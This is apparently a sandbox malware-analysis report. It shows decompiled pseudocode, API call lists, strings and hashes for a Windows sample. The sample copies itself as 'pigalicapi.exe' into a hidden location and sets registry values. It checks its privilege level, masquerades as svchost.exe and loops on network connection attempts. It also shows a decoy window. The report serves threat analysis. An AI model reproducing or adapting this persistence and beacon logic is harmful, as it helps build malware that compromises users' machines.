				 *0x401435b = _t85;
				 *0x401435f = 1; // executed
				_t86 = E04006CF0(); // executed
				_v1149 = _t86;
				_t87 = E04005F30(); // executed
				 *0x401435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
				_t88 = E04009B90(0xffffffff);
				_t173 = _t165 + 0x50;
				 *0x4014364 = _t88;
				_t89 =  &_v1556;
				_push(_t89);
				_push(0x202); // executed
				L0400B1E6(); // executed
				if(_t89 != 0) {
					goto L39;
				} else {
					_t125 =  *0x40119a8; // 0x1d
					_v12081 = _t125;
					 *0x4014378 = 0x10;
					if(( *0x401435f & 0x000000ff) != 0) {
						_t118 =  *0x4014378; // 0x1c
						 *0x4014378 = _t118 | 0x00000008;
					}
					if(( *0x401435c & 0x000000ff) != 0) {
						_t161 =  *0x4014378; // 0x1c
						 *0x4014378 = _t161 | 0x00000001;
					}
					if(( *0x401435b & 0x000000ff) != 0) {
						_t140 =  *0x4014378; // 0x1c
						 *0x4014378 = _t140 | 0x00000004;
					}
					if(( *0x401435e & 0x000000ff) != 0) {
						_t116 =  *0x4014378; // 0x1c
						 *0x4014378 = _t116 | 0x00000002;
					}
					if(( *0x4014360 & 0x000000ff) != 0) {
						_t159 =  *0x4014378; // 0x1c
						 *0x4014378 = _t159 | 0x00000020;
					}
					_t91 =  *0x4014361 & 0x000000ff;
					if(( *0x4014361 & 0x000000ff) != 0) {
						_t138 =  *0x4014378; // 0x1c
						 *0x4014378 = _t138 | 0x00000040;
					}
					_v9564 = 0x9c3;
					E04007D20(_t91,  &_v12068, 0, 0x9c4);
					E0400A700();
					E0400A4B0( &_v12068,  &_v9564, 0x4013cb6,  *0x4013cb4 & 0x0000ffff);
					_v9560 = 0;
					_t97 = E04005B50( &_v12068, ";",  &_v9560, 0); // executed
					_v12072 = _t97;
					_v12092 = 0;
					_v12080 = 0;
					_v12076 = 0x4b0;
					_t98 = E04008A70(0x4012c34,  &_v12076, 0x4012ba8, 0x8c, 0x400e008, 0x254); // executed
					_t177 = _t173 + 0x44;
					if(_t98 != 0) {
						E04007D20( &_v9556,  &_v9556, 0, 0x1f40);
						E040078D0(0x4012c34, 0xc8,  &_v9556, 0xc8);
						_t177 = _t177 + 0x1c;
						_v12092 =  &_v9556;
						_v12080 = 0xc8;
					}
					_v12088 = 0;
					L17:
					_v12101 = 0;
					_v12108 = 0x1d4c0;
					_v12096 = 0;
					_t100 = E04007970( &_v12096); // executed
					_v12100 = _t100;
					_t102 = E04004020(_v12096, _v12100,  &_v1148, 1, 2, 0);
					_t177 = _t177 + 0x1c;
					if((_t102 & 0x000000ff) != 0) {
						_v12101 = 1;
					} else {
						_t104 = E04004020(_v12092, _v12080,  &_v1148, 1, 5, 0);
						_t177 = _t177 + 0x18;
						if((_t104 & 0x000000ff) != 0) {
							_v12101 = 1;
						} else {
							_t106 = E04004020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
							_t177 = _t177 + 0x18;
							if((_t106 & 0x000000ff) != 0) {
								_v12101 = 1;
							} else {
								_v12116 = 0;
								_v12112 = E040042E0( &_v12116);
								_t110 = E04004020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
								_t177 = _t177 + 0x1c;
								if((_t110 & 0x000000ff) != 0) {
									_v12101 = 1;
								}
								if(_v12116 != 0) {
									VirtualFree(_v12116, 0, 0x8000);
								}
							}
						}
					}
					if((_v12101 & 0x000000ff) != 0) {
						if( *0x40118a4 != 1) {
							if( *0x40118a4 == 2) {
								 *0x40118a4 = 1;
								_v12108 = 0x1499700;
							}
						} else {
							if( *0x40130e4 != 2) {
								_v12108 = 0x1499700;
							} else {
								_v12108 = 0x3e8;
								 *0x40118a4 = 2;
							}
						}
					}
					Sleep(_v12108); // executed
					goto L17;
				}
			}

0x04003b08
0x04003b12
0x04003b19
0x04003b2d
0x04003b38
0x04003b40
0x04003b4f
0x04003b54
0x04003b5c
0x0400400a
0x0400400c
0x0400400c
0x04003b70
0x04003b7f
0x04003b8c
0x04003b9a
0x04003ba2
0x04003bb4
0x04003bca
0x04003bd2
0x04003bd7
0x04003be1
0x04003be6
0x04003beb
0x04003bfa
0x04003c02
0x04003c06
0x04003c2a
0x04003c34
0x04003c3c
0x04003c41
0x04003c48
0x04003c4d
0x04003c53
0x04003c64
0x04003c6c
0x04003c71
0x04003c74
0x04003c79
0x04003c7f
0x04003c80
0x04003c85
0x04003c8c
0x00000000
0x04003c92
0x04003c92
0x04003c98
0x04003c9e
0x04003cb1
0x04003cb3
0x04003cbb
0x04003cbb
0x04003cc9
0x04003ccb
0x04003cd4
0x04003cd4
0x04003ce3
0x04003ce5
0x04003cee
0x04003cee
0x04003cfd
0x04003cff
0x04003d07
0x04003d07
0x04003d15
0x04003d17
0x04003d20
0x04003d20
0x04003d26
0x04003d2f
0x04003d31
0x04003d3a
0x04003d3a
0x04003d40
0x04003d58
0x04003d60
0x04003d80
0x04003d88
0x04003da7
0x04003daf
0x04003db5
0x04003dbf
0x04003dc9
0x04003df3
0x04003df8
0x04003dfd
0x04003e0d
0x04003e2b
0x04003e30
0x04003e39
0x04003e3f
0x04003e3f
0x04003e49
0x04003e53
0x04003e53
0x04003e5a
0x04003e64
0x04003e75
0x04003e7d
0x04003e9e
0x04003ea3
0x04003eab
0x04003f8a
0x04003eb1
0x04003ecc
0x04003ed1
0x04003ed9
0x04003f81
0x04003edf
0x04003efa
0x04003eff
0x04003f07
0x04003f78
0x04003f09
0x04003f09
0x04003f22
0x04003f43
0x04003f48
0x04003f50
0x04003f52
0x04003f52
0x04003f60
0x04003f70
0x04003f70
0x04003f76
0x04003f7f
0x04003f88
0x04003f9a
0x04003fa3
0x04003fd7
0x04003fd9
0x04003fe3
0x04003fe3
0x04003fa5
0x04003fac
0x04003fc4
0x04003fae
0x04003fae
0x04003fb8
0x04003fb8
0x04003fce
0x04003fa3
0x04003ff4
0x00000000
0x04003ff4

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 04003B2D
SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 04003B38
CoInitialize.OLE32(00000000), ref: 04003B40

Part of subcall function 04004510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
Part of subcall function 04004510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
Part of subcall function 04004510: GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
Part of subcall function 04004510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
Part of subcall function 04004510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
Part of subcall function 04004510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
Part of subcall function 04004510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
Part of subcall function 04004510: CloseHandle.KERNEL32(00000000), ref: 040047E0

ExitProcess.KERNEL32 ref: 0400400C

Part of subcall function 04005700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
Part of subcall function 04005700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
Part of subcall function 04005700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
Part of subcall function 04005700: wnsprintfA.SHLWAPI ref: 0400582F
Part of subcall function 04005700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
Part of subcall function 04005700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D

Part of subcall function 04005A00: lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 04005A47
Part of subcall function 04005A00: lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
Part of subcall function 04005A00: lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005AA1
Part of subcall function 04005A00: lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 04005AAE
Part of subcall function 04005A00: lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 04005AC8
Part of subcall function 04005A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
Part of subcall function 04005A00: RegCloseKey.KERNEL32(00000000), ref: 04005B0E
Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005B3B

Part of subcall function 04009400: lstrcpyA.KERNEL32(?,00000000), ref: 04009513
Part of subcall function 04009400: CharUpperA.USER32(?), ref: 04009521

Part of subcall function 040099F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
Part of subcall function 040099F0: OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
Part of subcall function 040099F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
Part of subcall function 040099F0: EqualSid.ADVAPI32(?,00000000), ref: 04009AC3

Part of subcall function 04006060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04006082

Part of subcall function 04005E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
Part of subcall function 04005E00: GetLastError.KERNEL32(?,04003BEB), ref: 04005E12

StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 04003BFA

Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 04001148
Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 0400115A
Part of subcall function 04001120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
Part of subcall function 04001120: wnsprintfA.SHLWAPI ref: 040011BD
Part of subcall function 04001120: lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
Part of subcall function 04001120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
Part of subcall function 04001120: SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
Part of subcall function 04001120: lstrcpyA.KERNEL32(00000104,?), ref: 04001210
Part of subcall function 04001120: lstrcpyA.KERNEL32(00000000,?), ref: 04001249
Part of subcall function 04001120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
Part of subcall function 04001120: CreateThread.KERNEL32 ref: 04001274

Part of subcall function 04005E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
Part of subcall function 04005E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
Part of subcall function 04005E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
Part of subcall function 04005E30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
Part of subcall function 04005E30: RegCloseKey.KERNEL32(00000000), ref: 04005F19

Part of subcall function 04006CF0: RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
Part of subcall function 04006CF0: RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
Part of subcall function 04006CF0: RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
Part of subcall function 04006CF0: RegCloseKey.ADVAPI32(00000000), ref: 04006D88

Part of subcall function 04005F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
Part of subcall function 04005F30: lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
Part of subcall function 04005F30: RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
Part of subcall function 04005F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
Part of subcall function 04005F30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
Part of subcall function 04005F30: RegCloseKey.KERNEL32(00000000), ref: 04006045

WSAStartup.WS2_32(00000202,?), ref: 04003C85

Part of subcall function 04004020: InitializeCriticalSection.KERNEL32(?), ref: 04004066
Part of subcall function 04004020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
Part of subcall function 04004020: EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
Part of subcall function 04004020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
Part of subcall function 04004020: TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
Part of subcall function 04004020: ResetEvent.KERNEL32(00000000), ref: 040040F7
Part of subcall function 04004020: LeaveCriticalSection.KERNEL32(?), ref: 04004101
Part of subcall function 04004020: CreateThread.KERNEL32 ref: 04004118

VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04003F70
Sleep.KERNEL32(?), ref: 04003FF4

Strings

R+g, xrefs: 04003D7F
pigalicapi, xrefs: 04003C20
C:\Users\user\pigalicapi.exe, xrefs: 04003B26, 04003BF5, 04003C25
Hogerfazwafx, xrefs: 04003BAF, 04003BBE
svchost.exe, xrefs: 04003BF0

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
String ID: C:\Users\user\pigalicapi.exe$Hogerfazwafx$R+g$pigalicapi$svchost.exe
API String ID: 1389186475-402523118
Opcode ID: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
Instruction ID: 63648f9aec36bb26e753af5ac432a688f143a616cbd4529da37374c18a699aed
Opcode Fuzzy Hash: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
Instruction Fuzzy Hash: 7EC11AB0944364AAF725DF64AC19BFA77B0AB04709F0480FDE6487A1E1DB7C6A84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00401179 Relevance: 21.2, APIs: 14, Instructions: 208
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401179() {
				void* _v16;
				signed int _v48;
				void* _v52;
				char _v96;
				void* _v112;
				void* _v113;
				signed int _v116;
				void* _v120;
				long _v132;
				void* _v136;
				long _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t48;
				signed int _t50;
				signed int _t51;
				long _t53;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				_Unknown_base(*)()* _t59;
				signed char* _t63;
				signed int _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t70;
				long _t71;
				signed int _t72;
				void* _t73;
				void* _t77;
				signed int _t84;
				signed int _t85;
				long _t87;
				signed int _t88;
				signed int _t90;
				void* _t95;
				signed int _t96;
				struct _STARTUPINFOA* _t97;
				void* _t98;
				signed int _t100;
				signed int _t101;
				void* _t102;
				void* _t105;
				signed int _t106;
				intOrPtr _t108;
				void* _t109;
				long _t111;
				intOrPtr _t112;
				void* _t114;
				void* _t115;
				void* _t117;
				signed int _t121;
				void* _t122;
				void** _t123;

				while(1) {
					L1:
					_push(_t115);
					_t115 = _t117;
					_push(_t102);
					_push(_t108);
					_t97 =  &_v96;
					memset(_t97, 0, 0x11 << 2);
					_t48 = E0040DB20(0x30, _t86);
					_t50 =  &_v113 & 0xfffffff0;
					 *_t50 = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 4)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 8)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0xc)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x10)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x14)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x18)) = 0xcccccccc;
					 *((intOrPtr*)(_t50 + 0x1c)) = 0xcccccccc;
					_t121 = _t117 - 0x0000007c + 0xc - _t48 & 0xfffffff0;
					_t51 =  *0x422054; // 0x1
					if(_t51 != 0) {
						GetStartupInfoA(_t97);
						_t121 = _t121 - 4;
					}
					_t109 = InterlockedCompareExchange;
					_t87 =  *( *[fs:0x18] + 4);
					_t105 = Sleep;
					while(1) {
						_t53 = InterlockedCompareExchange(0x422480, _t87, 0);
						_t122 = _t121 - 0xc;
						if(_t53 == 0) {
							break;
						}
						if(_t53 == _t87) {
							_t54 =  *0x422484; // 0x2
							_t86 = 1;
							if(_t54 != 1) {
								L7:
								_t55 =  *0x422484; // 0x2
								if(_t55 == 0) {
									 *0x422484 = 1;
									_v136 = 0x42c018;
									_v140 = 0x42c00c;
									L0040EE78();
								} else {
									 *0x422004 = 1;
								}
								_t56 =  *0x422484; // 0x2
								if(_t56 == 1) {
									goto L36;
								} else {
									goto L10;
								}
							} else {
								L35:
								_v140 = 0x1f;
								L0040EE70();
								_t84 =  *0x422484; // 0x2
								if(_t84 != 1) {
									L10:
									if(_t86 == 0) {
										goto L37;
									}
								} else {
									L36:
									_v136 = 0x42c008;
									_v140 = 0x42c000;
									L0040EE78();
									 *0x422484 = 2;
									if(_t86 == 0) {
										L37:
										InterlockedExchange(0x422480, 0);
										_t122 = _t122 - 8;
									}
								}
							}
							L43:
						} else {
							Sleep(0x3e8);
							_t121 = _t122 - 4;
							continue;
						}
						L11:
						_t57 =  *0x420a80; // 0x40ca60
						if(_t57 != 0) {
							_v132 = 0;
							_v136 = 2;
							_v140 = 0;
							 *_t57();
							_t122 = _t122 - 0xc; // executed
						}
						E0040D0C0(_t86, _t105, _t109); // executed
						_v140 = E0040CC00; // executed
						_t59 = SetUnhandledExceptionFilter(??); // executed
						_t123 = _t122 - 4;
						 *0x422064 = _t59;
						 *_t123 = 0x401000;
						E0040D3A0(E0040EE40());
						 *0x422474 = 0x400000;
						_t63 =  *_acmdln;
						if(_acmdln != 0) {
							_t96 = 0;
							while(1) {
								_t100 =  *_t63 & 0x000000ff;
								if(_t100 <= 0x20) {
									goto L15;
								}
								L20:
								_t86 = _t96 ^ 0x00000001;
								_t96 =  ==  ? _t96 ^ 0x00000001 : _t96;
								L18:
								_t63 =  &(_t63[1]);
								_t100 =  *_t63 & 0x000000ff;
								if(_t100 <= 0x20) {
									goto L15;
								}
								goto L24;
								L15:
								if(_t100 != 0) {
									if(_t96 == 0) {
										while(1) {
											_t63 =  &(_t63[1]);
											_t101 =  *_t63 & 0x000000ff;
											if(_t101 > 0x20) {
												goto L23;
											}
											if(_t101 != 0) {
												continue;
											}
											goto L23;
										}
									} else {
										_t96 = 1;
										goto L18;
									}
								}
								L23:
								 *0x422470 = _t63;
								goto L24;
							}
						}
						L24:
						_t106 =  *0x422054; // 0x1
						if(_t106 != 0) {
							_t81 =  !=  ? _v48 & 0x0000ffff : 0xa;
							 *0x41a000 =  !=  ? _v48 & 0x0000ffff : 0xa;
						}
						_t64 =  *0x42201c; // 0x1
						_v116 = _t64;
						_t65 = 4 + _t64 * 4;
						_v120 = _t65;
						 *_t123 = _t65;
						_t66 = malloc(??);
						_t102 =  *0x422018; // 0xe71260
						_v112 = _t66;
						if(_t64 <= 0) {
							_t67 = 0;
						} else {
							_t90 = 0;
							_t114 = _t102;
							do {
								 *_t123 =  *(_t114 + _t90 * 4);
								_t27 = strlen(??) + 1; // 0x1
								_t102 = _t27;
								 *_t123 = _t102;
								_t77 = malloc(??);
								 *(_v112 + _t90 * 4) = _t77;
								_t95 =  *(_t114 + _t90 * 4);
								_t90 = _t90 + 1;
								_v136 = _t102;
								 *_t123 = _t77;
								_v140 = _t95;
								memcpy(??, ??, ??);
							} while (_t90 != _v116);
							_t67 = _v120 - 4;
						}
						_t111 = _v112;
						 *(_t111 + _t67) = 0;
						 *0x422018 = _t111;
						E0040D430();
						_t98 =  *0x422014; // 0xe714b8
						 *__imp____initenv = _t98;
						_t70 =  *0x422014; // 0xe714b8
						_v136 = _t70;
						_t71 =  *0x422018; // 0xe71260
						_v140 = _t71;
						_t72 =  *0x42201c; // 0x1
						 *_t123 = _t72; // executed
						_t73 = E00419090();
						_t112 =  *0x422008; // 0x0
						 *0x42200c = _t73;
						if(_t112 == 0) {
							 *_t123 = _t73;
							exit(??);
							_t108 = _t112;
							 *0x422054 = 1;
							E0040D450();
							_t117 = _t123 - 0xc + 0xc;
							goto L1;
						}
						_t88 =  *0x422004; // 0x0
						if(_t88 == 0) {
							L0040EE68();
							_t73 =  *0x42200c; // 0x0
						}
						return _t73;
						goto L43;
					}
					_t85 =  *0x422484; // 0x2
					_t86 = 0;
					if(_t85 == 1) {
						goto L35;
					} else {
						goto L7;
					}
					goto L11;
				}
			}

0x00401180
0x00401180
0x00401180
0x00401183
0x0040118a
0x0040118b
0x0040118c
0x00401195
0x00401199
0x004011a4
0x004011a7
0x004011ad
0x004011b4
0x004011bb
0x004011c2
0x004011c9
0x004011d0
0x004011d7
0x004011de
0x004011e1
0x004011e8
0x00401493
0x00401499
0x00401499
0x004011f4
0x004011fa
0x004011fd
0x00401219
0x0040122c
0x0040122e
0x00401233
0x00000000
0x00000000
0x00401207
0x00401420
0x00401425
0x0040142d
0x00401245
0x00401245
0x0040124c
0x004014a1
0x004014ab
0x004014b3
0x004014ba
0x00401252
0x00401252
0x00401252
0x0040125c
0x00401264
0x00000000
0x00000000
0x00000000
0x00000000
0x00401433
0x00401433
0x00401433
0x0040143a
0x0040143f
0x00401447
0x0040126a
0x0040126c
0x00000000
0x00000000
0x0040144d
0x0040144d
0x0040144d
0x00401455
0x0040145c
0x00401463
0x0040146d
0x00401473
0x00401482
0x00401488
0x00401488
0x0040146d
0x00401447
0x00000000
0x0040120d
0x00401214
0x00401216
0x00000000
0x00401216
0x00401272
0x00401272
0x00401279
0x0040127b
0x00401283
0x0040128b
0x00401292
0x00401294
0x00401294
0x00401297
0x0040129c
0x004012a3
0x004012a9
0x004012ac
0x004012b1
0x004012bd
0x004012c7
0x004012d1
0x004012d5
0x004012d7
0x004012f0
0x004012f0
0x004012f6
0x00000000
0x00000000
0x004012f8
0x004012fa
0x00401300
0x004012ed
0x004012ed
0x004012f0
0x004012f6
0x00000000
0x00000000
0x00000000
0x004012e0
0x004012e2
0x004012e6
0x00401309
0x00401309
0x0040130c
0x00401312
0x00000000
0x00000000
0x00401307
0x00000000
0x00000000
0x00000000
0x00401307
0x004012e8
0x004012e8
0x00000000
0x004012e8
0x004012e6
0x00401314
0x00401314
0x00000000
0x00401314
0x004012f0
0x00401319
0x00401319
0x00401321
0x00401330
0x00401333
0x00401333
0x00401338
0x0040133d
0x00401342
0x00401349
0x0040134c
0x0040134f
0x00401356
0x0040135c
0x0040135f
0x004014c4
0x00401365
0x00401365
0x00401367
0x00401370
0x00401373
0x0040137b
0x0040137b
0x0040137e
0x00401381
0x00401389
0x0040138c
0x0040138f
0x00401392
0x00401396
0x00401399
0x0040139d
0x004013a2
0x004013aa
0x004013aa
0x004013ad
0x004013b0
0x004013b7
0x004013bd
0x004013c7
0x004013cd
0x004013cf
0x004013d4
0x004013d8
0x004013dd
0x004013e1
0x004013e6
0x004013e9
0x004013ee
0x004013f6
0x004013fb
0x004014cb
0x004014d0
0x004014d5
0x004014e3
0x004014ed
0x004014f2
0x00000000
0x004014f2
0x00401401
0x00401409
0x0040140b
0x00401410
0x00401410
0x0040141c
0x00000000
0x0040141c
0x00401235
0x0040123a
0x0040123f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040123f

APIs

Sleep.KERNEL32 ref: 00401214
InterlockedCompareExchange.KERNEL32 ref: 0040122C
SetUnhandledExceptionFilter.KERNEL32 ref: 004012A3
malloc.MSVCRT ref: 0040134F
strlen.NTDLL ref: 00401376
malloc.MSVCRT ref: 00401381
memcpy.NTDLL ref: 0040139D
GetStartupInfoA.KERNEL32 ref: 00401493

Memory Dump Source

Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: malloc$CompareExceptionExchangeFilterInfoInterlockedSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 52093863-0
Opcode ID: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
Instruction ID: 8e4e66b0b0a685f907c53a036abd111b35ec28aa5b749cb82d3d57855afc03b1
Opcode Fuzzy Hash: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
Instruction Fuzzy Hash: 259191B1A04301CFD720EF69DA8075A7BF4FB44304F81493ED984AB3A1D7B89845CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402075 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 193
windowCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00402075(struct HINSTANCE__* _a4) {
				void* _v16;
				char _v28;
				struct HWND__* _v32;
				struct HWND__** _v36;
				struct HWND__** _v40;
				struct HWND__* _v44;
				struct HWND__* _v64;
				char _v72;
				struct HWND__* _v76;
				struct HWND__* _v80;
				struct _WNDCLASSEXA _v128;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v188;
				char _v192;
				struct HWND__* _v196;
				struct HWND__* _v228;
				struct HINSTANCE__* _v232;
				struct HWND__* _v236;
				struct HWND__* _v240;
				intOrPtr _v244;
				CHAR* _v248;
				struct HWND__* _v252;
				struct HWND__* _v256;
				intOrPtr _v260;
				CHAR* _v264;
				CHAR* _v268;
				struct HWND__* _v272;
				struct HWND__** _v276;
				struct HWND__* _v288;
				struct HWND__* _v292;
				struct HWND__* _v296;
				intOrPtr* _t92;
				struct HICON__* _t102;
				signed int _t105;
				struct HWND__* _t109;
				int _t112;
				signed int _t131;
				struct HWND__* _t139;
				void* _t151;
				intOrPtr _t152;
				void* _t156;
				void* _t157;
				struct HWND__*** _t158;
				intOrPtr* _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;

				_t152 = _t151 - 0xec;
				_v168 = E00418AA0;
				_v164 = 0x41910c;
				_t92 =  &_v160;
				_t149 =  &_v28;
				 *_t92 =  &_v28;
				_t150 = E00402410;
				 *((intOrPtr*)(_t92 + 4)) = E00402410;
				 *((intOrPtr*)(_t92 + 8)) = _t152;
				E0040E1A0( &_v28, E00402410,  &_v192);
				_v128.cbSize = 0x30;
				_v128.style = 0;
				_v128.lpfnWndProc = E00401A9C;
				_v128.cbClsExtra = 0;
				_v128.cbWndExtra = 0;
				_v128.hInstance = _a4;
				_v248 = 0x7f00;
				_v252 = 0;
				_v188 = 1;
				_v128.hIcon = LoadIconA(??, ??);
				_v128.hCursor = LoadCursorA(0, 0x7f00);
				_v128.hbrBackground = 6;
				_v128.lpszMenuName = "MAINMENU";
				_v128.lpszClassName = "WindowClass";
				_t102 = LoadIconA(_a4, 0x41f0eb); // executed
				_v128.hIconSm = _t102;
				_t105 = RegisterClassExA( &_v128);
				_t156 = _t152 - 0xfffffffffffffff4;
				if((_t105 & 0xffffff00 | _t105 == 0x00000000) == 0) {
					_v228 = 0;
					_v232 = _a4;
					_v236 = 0;
					_v240 = 0;
					_v244 = 0xf0;
					_v248 = 0x140;
					_v252 = 0x80000000;
					_v256 = 0x80000000;
					_v260 = 0xcf0000;
					_v264 = "File Editor Example Program";
					_v268 = "WindowClass";
					_v272 = 0x200;
					_v188 = 1;
					_t109 = CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
					_t157 = _t156 - 0x30;
					_v32 = _t109;
					if(_v32 != 0) {
						_v268 = 0;
						_v272 = _v32;
						_v188 = 1;
						_t112 = ShowWindow(??, ??); // executed
						_t158 = _t157 - 8;
						_v36 = 0x7c3;
						_v40 = 0xe0f;
						_v76 = 0;
						_v80 = 0;
						if((E00401E50(_t112) & 0xffffff00 | _t113 != 0x00000000) != 0) {
							 *_t158 = 0xffffa883;
							ExitProcess(??);
						}
						 *0x41a004 = 0;
						 *0x41a008 = 0;
						 *0x41a00c = 0;
						 *0x41a014 = 0;
						 *0x41a010 = 0;
						 *0x41a018 = 0;
						 *0x422038 = 0x17149d65;
						_v276 =  &_v80;
						 *_t158 = _v36;
						_v188 = 1;
